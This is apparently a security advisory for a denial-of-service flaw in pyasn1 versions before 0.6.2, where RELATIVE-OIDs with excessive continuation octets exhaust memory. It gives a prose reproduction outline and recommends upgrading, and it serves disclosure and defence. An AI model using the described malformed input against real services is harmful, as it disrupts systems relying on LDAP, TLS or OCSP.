pyasn1 Denial-of-Service Vulnerability in RELATIVE-OID Decoder Prior to 0.6.2

A denial-of-service vulnerability has been identified in the pyasn1 library, specifically in versions prior to 0.6.2. The issue arises in the OID decoder, where malformed RELATIVE-OIDs containing excessive continuation octets can lead to memory exhaustion. This vulnerability can be exploited by creating a malicious OID that exceeds the allowed limit of continuation octets, causing the decoder to consume excessive resources and potentially hang the application or service.

Impact

Exploitation of this vulnerability leads to memory exhaustion, causing applications or services to hang or stop functioning. This can disrupt operations, especially for services that rely on LDAP, TLS/SSL, or OCSP.

Reproduction

The vulnerability can be reproduced by using the pyasn1 library's BER decoder with a RELATIVE-OID that includes more than 20 continuation octets. This can be done by manually crafting a byte sequence that represents a RELATIVE-OID and includes excessive continuation bytes, then decoding it with the OID decoder. The decoder will accept the OID but fail to process it correctly, leading to memory exhaustion.

Remediation

Users are advised to update to pyasn1 version 0.6.2, where this vulnerability has been fixed.